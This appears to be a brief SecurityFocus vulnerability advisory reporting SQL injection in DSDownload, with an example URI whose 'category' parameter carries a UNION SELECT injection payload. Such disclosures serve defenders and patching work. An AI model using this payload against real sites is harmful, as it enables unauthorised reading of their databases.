DSDownload Multiple SQL-Injection Vulnerabilities

This issue can be exploited through a web client.

The following example URI is available:

http://www.example.com/dsdownload/downloads.php? category=999'% 20union%20select% 206,2,3,4,5, 1,7,8/*


 

Privacy Statement
Copyright 2010, SecurityFocus